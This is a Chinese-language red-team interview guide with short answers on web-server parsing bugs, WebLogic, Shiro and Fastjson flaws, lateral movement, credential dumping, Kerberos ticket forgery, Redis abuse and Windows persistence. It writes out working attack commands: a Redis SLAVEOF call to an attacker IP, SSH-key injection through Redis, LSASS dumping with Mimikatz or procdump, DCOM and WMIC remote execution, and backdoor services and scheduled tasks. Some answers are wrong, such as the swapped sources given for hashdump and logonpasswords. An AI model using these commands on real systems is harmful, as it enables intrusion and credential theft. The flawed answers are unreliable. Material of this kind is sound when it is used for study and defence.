2025年滲透測試面試題總結-滲透測試紅隊面試八（題目+回答）

網絡安全領域各種資源，學習文檔，以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具，歡迎關注。

滲透測試紅隊面試八

二百一十一、常見中間件解析漏洞利用方式

二百一十二、MySQL用戶密碼存儲與加密

二百一十三、Linux系統加固降權思路

二百一十四、繞過CDN獲取真實IP

二百一十五、CMD查詢遠程開放端口

二百一十六、查找域控方法

二百一十七、CSRF成因及防御（非Token方案）

二百一十八、打點常用漏洞

二百一十九、Shiro漏洞發現方法

二百二十、WebLogic權限繞過

二百二十一、Fastjson漏洞原理

二百二十二、WebLogic漏洞類型

二百二十三、IIOP協議與類似技術

二百二十四、不出網漏洞利用方法

二百二十五、Webshell不出網應對措施

二百二十六、DNS出網協議利用

二百二十七、橫向滲透命令執行手段

二百二十八、PsExec與WMIC區別

二百二十九、DCOM遠程執行操作

二百三十、密碼抓取方法

二百三十一、密碼抓取版本限制

二百三十二、抓不到密碼的應對

二百三十三、域內攻擊方法

二百三十四、NTLM驗證機制

二百三十五、Kerberos票據攻擊

二百三十六、Windows Redis利用

二百三十七、Linux Redis利用

二百三十八、Windows后門方式

二百三十九、CS的哈希與密碼獲取

二百四十、收集RDP記錄及對抗殺軟

滲透測試紅隊面試八
二百一十一、說說常見的中間件解析漏洞利用方式二百一十二、mysql的用戶名密碼是存放在那張表里面？mysql密碼采用哪種加密方式？二百一十三、Windows、Linux、數據庫的加固降權思路，任選其一二百一十四、如何繞過CDN獲取目標網站真實IP，談談你的思路？二百一十五、CMD命令行如何查詢遠程終端開放端口二百一十六、怎么查找域控二百一十七、CSRF 成因及防御措施；如果不用 token 如何做防御？二百一十八、打點一般會用什么漏洞二百一十九、平常怎么去發現shiro漏洞的二百二十、weblogic權限繞過有沒有了解二百二十一、fastjson漏洞利用原理二百二十二、weblogic有幾種漏洞二百二十三、IIOP聽說過嗎，和什么類似二百二十四、這幾個漏洞不出網情況下怎么辦二百二十五、拿到webshell不出網情況下怎么辦二百二十六、dns出網協議怎么利用二百二十七、橫向滲透命令執行手段二百二十八、psexec和wmic或者其他的區別二百二十九、Dcom怎么操作？二百三十、抓取密碼的話會怎么抓二百三十一、什么版本之后抓不到密碼二百三十二、抓不到的話怎么辦二百三十三、域內攻擊方法有了解過嗎二百三十四、ntlm驗證機制二百三十五、kerberos認證黃金、白銀票據制作原理，以及需要哪個值二百三十六、window redis 需要有哪些利用手段，除了寫文件和啟動項二百三十七、linux redis 寫有哪些利用方式二百三十八、windows后門包括哪些方式二百三十九、cs hashdump和logonpasswd 分別從哪里讀取哈希和密碼二百四十、如何收集rdp連接記錄，如果有殺軟怎么辦
二百一十一、常見中間件解析漏洞利用方式

IIS解析漏洞
目錄解析：/test.asp;.jpg 被解析為ASP腳本（IIS6.0）。
分號截斷：test.asp;.jpg 利用分號繞過擴展名檢查。
PUT寫文件：通過HTTP PUT方法上傳腳本文件（需配置不當）。

Apache解析漏洞
多后綴解析：test.php.xxx 若.xxx未定義，按最后一個有效后綴解析（如.php）。
.htaccess覆蓋：上傳自定義.htaccess設置解析規則（如AddType application/x-httpd-php .jpg）。

Nginx解析漏洞
路徑解析錯誤：/test.jpg/test.php 將test.jpg 作為PHP執行（Nginx + PHP-FPM配置不當）。
CVE-2013-4547：利用未正確處理空格和\0字符繞過檢查（如test.jpg \0.php ）。

二百一十二、MySQL用戶密碼存儲與加密

存儲位置
表名：mysql.user 表存儲用戶名、主機權限及密碼哈希。
字段：authentication_string（MySQL 5.7+）或password（舊版）。

加密方式
MySQL 4.1+：雙重SHA1加密（SHA1(SHA1(password))）。
MySQL 8.0+：默認使用caching_sha2_password插件（SHA256哈希）。

補充信息
查詢用戶權限：SELECT user, host, authentication_string FROM mysql.user;
身份驗證插件變更可能導致舊客戶端兼容性問題（需啟用mysql_native_password）。

二百一十三、Linux系統加固降權思路

最小權限原則
用戶權限：創建低權限用戶運行服務（如www-data運行Web服務）。
SUID/SGID清理：find / -perm /4000 -o -perm /2000查找并刪除非必要特權文件。

服務與網絡加固
禁用無用服務：systemctl disable vsftpd關閉FTP等非必要服務。
防火墻規則：iptables限制僅開放必要端口（如SSH僅允許特定IP）。

文件系統安全
敏感文件權限：chmod 600 /etc/shadow限制訪問。
SELinux/AppArmor：啟用強制訪問控制，限制進程權限。

二百一十四、繞過CDN獲取真實IP

歷史記錄查詢
DNS歷史：通過SecurityTrails、ViewDNS查詢歷史解析記錄。
IP數據庫：使用Censys或Shodan搜索目標域名早期綁定的IP。

子域名探測
爆破子域：subfinder或amass發現未使用CDN的子域（如dev.example.com ）。
郵件服務器：分析郵件頭中Received字段獲取服務器IP。

主動探測技巧
SSRF漏洞：利用目標站點的SSRF讀取內網元數據（如AWS的169.254.169.254）。
全網段掃描：對目標域名解析的CDN IP段進行端口掃描，尋找非標準端口服務。

二百一十五、CMD查詢遠程開放端口

基礎命令
Telnet：telnet <IP> <端口>（若連接成功則端口開放）。
Netstat：netstat -ano | findstr "ESTABLISHED"查看本地連接。

PowerShell工具
Test-NetConnection：Test-NetConnection <IP> -Port <端口>顯示端口狀態。

第三方工具
Nmap：nmap -p 1-1000 <IP>掃描指定端口范圍。
PortQry：微軟工具，支持批量端口檢測。

二百一十六、查找域控方法
DNS查詢
SRV記錄：nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>定位域控的LDAP服務。

系統命令
nltest：nltest /dclist:<域名>列出域控列表。
net命令：net group "Domain Controllers" /domain查詢域控組。
LDAP查詢
PowerShell：
powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address 
二百一十七、CSRF成因及防御（非Token方案）

漏洞成因
瀏覽器自動攜帶Cookie：攻擊者誘導用戶訪問惡意頁面，觸發跨站請求。
無二次驗證：敏感操作未校驗請求來源。

防御措施（非Token）
SameSite Cookie：設置SameSite=Strict限制跨站請求。
Referer驗證：檢查HTTP頭Referer是否來自合法域名。
CAPTCHA驗證：關鍵操作前要求用戶輸入驗證碼。

二百一十八、打點常用漏洞

Web漏洞
SQL注入：通過注入獲取數據庫權限（如后臺管理員憑證）。
文件上傳：上傳Webshell控制服務器（如繞過類型檢查）。

服務漏洞
未授權訪問：Redis、MongoDB等直接執行命令。
RCE漏洞：如Log4j2、Fastjson反序列化。

配置缺陷
默認密碼：Tomcat、Jenkins等管理界面弱口令。
SSRF：利用內網探測或元數據服務攻擊。

二百一十九、Shiro漏洞發現方法

Cookie特征識別
RememberMe字段：Base64解碼后開頭為x01x02x03或x04（序列化數據特征）。

漏洞掃描工具
ShiroExploit：自動化檢測密鑰及反序列化漏洞。
Burp插件：ShiroScan檢測Cookie有效性。

手工檢測
密鑰爆破：利用已知密鑰列表（如kPH+bIxk5D2deZiIxcaaaA==）測試反序列化。
DNSLog驗證：構造惡意序列化數據觸發DNS請求，確認漏洞存在。

二百二十、WebLogic權限繞過

CVE-2020-14882
未授權訪問：訪問/console/css/%252e%252e%252fconsole.portal 繞過控制臺認證。
利用工具：weblogic-framework直接執行命令。

CVE-2021-2109
管理接口繞過：通過構造特殊URL路徑訪問后臺功能。

修復建議
更新補丁，限制管理接口訪問IP，啟用強認證機制。

二百二十一、Fastjson漏洞原理

反序列化機制
@type指定類：攻擊者通過JSON中的@type指定惡意類觸發Gadget鏈。
JNDI注入：利用com.sun.rowset.JdbcRowSetImpl 等類加載遠程惡意代碼。

漏洞版本
<=1.2.24：默認支持autoType，可直接利用。
1.2.25-1.2.47：需繞過autoType檢查（如利用L前綴或特殊類名）。

防御方案
升級至1.2.83+版本，關閉autoType功能，使用白名單機制。

二百二十二、WebLogic漏洞類型

反序列化漏洞
T3協議：CVE-2018-2628利用T3反序列化執行命令。
XMLDecoder：CVE-2017-10271通過WLS組件觸發。

SSRF漏洞
CVE-2014-4210：uddiexplorer組件未限制內網請求。

權限繞過
CVE-2020-14825：繞過Console組件權限校驗。

二百二十三、IIOP協議與類似技術

IIOP協議
用途：CORBA的通信協議，用于分布式對象調用。
類似技術：與RMI（Java遠程方法調用）類似，均涉及序列化數據傳輸。

漏洞利用
反序列化攻擊：通過IIOP傳輸惡意對象觸發Gadget鏈（如WebLogic CVE-2020-2551）。

二百二十四、不出網漏洞利用方法

DNS/ICMP隧道
DNS協議：使用dnscat2通過DNS查詢傳輸數據。
ICMP協議：利用ptunnel或icmpsh建立隱蔽通道。

內網服務中繼
SMB Relay：通過Responder工具捕獲NTLM哈希并中繼至其他主機。

Web反向連接
HTTP文件傳輸：通過Web服務上傳/下載文件（如Python http.server ）。

二百二十五、Webshell不出網應對措施

內網探測
掃描內網段：使用for /L %i in (1,1,255) do ping -n 1 192.168.1.%i發現存活主機。

利用現有服務
數據庫外聯：通過MySQL SELECT ... INTO OUTFILE寫入Web目錄。
郵件發送：使用SMTP協議將數據外傳。

內存加載
PowerShell腳本：反射加載惡意代碼，避免落地文件。

二百二十六、DNS出網協議利用

DNS隧道
工具：dnscat2建立加密隧道，執行命令或傳輸文件。
隱蔽性：利用TXT或CNAME記錄傳輸數據，繞過防火墻檢測。

數據滲透
子域名攜帶數據：data.example.com 解析為Base64編碼的敏感信息。

二百二十七、橫向滲透命令執行手段

PsExec
特點：需目標開啟ADMIN$共享，生成服務執行命令，日志明顯。

WMI
命令：wmic /node:<IP> process call create "cmd.exe /c whoami"
優勢：無需安裝客戶端，基于135端口。

SSH密鑰利用
條件：獲取目標SSH私鑰，通過ssh -i id_rsa user@ip直接登錄。

二百二十八、PsExec與WMIC區別

PsExec WMIC
需目標開啟ADMIN$共享和文件寫入權限。僅需135端口和有效憑證，無需文件操作。
生成服務進程，日志記錄明顯（svchost）。通過WMI協議執行，日志較隱蔽。
適合批量操作，但易觸發告警。更隱蔽，但命令長度受限。

二百二十九、DCOM遠程執行操作
原理
DCOM接口：通過COM對象遠程調用方法（如MMC20.Application）。
利用步驟
列出DCOM對象：Get-CimInstance Win32_DCOMApplication
執行命令：
powershell$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")
二百三十、密碼抓取方法

Mimikatz
命令：sekurlsa::logonpasswords提取內存中的明文密碼和哈希。

注冊表導出
SAM/SYSTEM文件：reg save HKLM\SAM SAM.bak 導出后使用secretsdump解析。

Procdump轉儲
轉儲LSASS：procdump.exe -ma lsass.exe lsass.dmp ，本地用Mimikatz解析。

二百三十一、密碼抓取版本限制

Windows 8.1/Server 2012+
WDigest禁用：默認不緩存明文密碼（需啟用注冊表項UseLogonCredential）。

Windows 10/Server 2016+
LSASS保護：啟用Credential Guard后無法直接讀取內存密碼。

二百三十二、抓不到密碼的應對

哈希傳遞（Pass-the-Hash）
工具：psexec.py 或crackmapexec使用NTLM哈希橫向移動。

Kerberos票據
黃金票據：利用krbtgt哈希偽造TGT，訪問任意服務。

二百三十三、域內攻擊方法

橫向移動
MS17-010：利用永恒之藍漏洞攻擊未修補主機。

權限提升
ACL濫用：修改域對象的ACL，授予自身特權（如DCsync權限）。

持久化
Skeleton Key：植入惡意域控后門，使用萬能密碼登錄。

二百三十四、NTLM驗證機制

三步握手
協商：客戶端發送NEGOTIATE_MESSAGE。
挑戰：服務器返回CHALLENGE_MESSAGE（包含隨機Nonce）。
認證：客戶端使用密碼哈希加密Nonce生成RESPONSE_MESSAGE。

中間人攻擊
NTLM Relay：將認證請求中繼至其他服務器，執行命令或獲取權限。

二百三十五、Kerberos票據攻擊

黃金票據
原理：偽造TGT票據，需krbtgt的NTLM哈希和域SID。
用途：訪問域內任意服務。

白銀票據
原理：偽造特定服務的ST票據，需服務賬戶哈希和服務SPN。
用途：僅限訪問特定服務（如CIFS文件共享）。

二百三十六、Windows Redis利用
主從復制RCE
步驟：設置惡意主節點，同步module.dll 執行命令。
命令：
bashredis-cli -h <target> SLAVEOF <attacker-ip> 6379 
計劃任務劫持
寫入任務：通過CONFIG SET dir和dbfilename寫入惡意任務文件。
二百三十七、Linux Redis利用
SSH密鑰寫入
命令：
basredis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save 
Crontab后門
寫入任務：設置定時任務反彈Shell。
二百三十八、Windows后門方式

注冊表啟動項
路徑：HKLM\Software\Microsoft\Windows\CurrentVersion\Run

計劃任務
命令：schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart

服務后門
創建服務：sc create EvilService binPath= "C:\evil.exe" start= auto

二百三十九、CS的哈希與密碼獲取

hashdump
來源：從LSASS進程內存中提取NTLM哈希。

logonpasswords
來源：從Windows憑據管理器獲取明文密碼（需WDigest啟用）。

二百四十、收集RDP記錄及對抗殺軟

記錄位置
注冊表：HKCU\Software\Microsoft\Terminal Server Client\Servers
日志文件：%USERPROFILE%\Documents\Default.rdp

繞過殺軟
離線提取：直接復制注冊表文件或日志到本地分析。
隱蔽工具：使用PowerShell腳本讀取注冊表，避免觸發行為檢測。

PsExec	WMIC
需目標開啟ADMIN$共享和文件寫入權限。	僅需135端口和有效憑證，無需文件操作。
生成服務進程，日志記錄明顯（svchost）。	通過WMI協議執行，日志較隱蔽。
適合批量操作，但易觸發告警。	更隱蔽，但命令長度受限。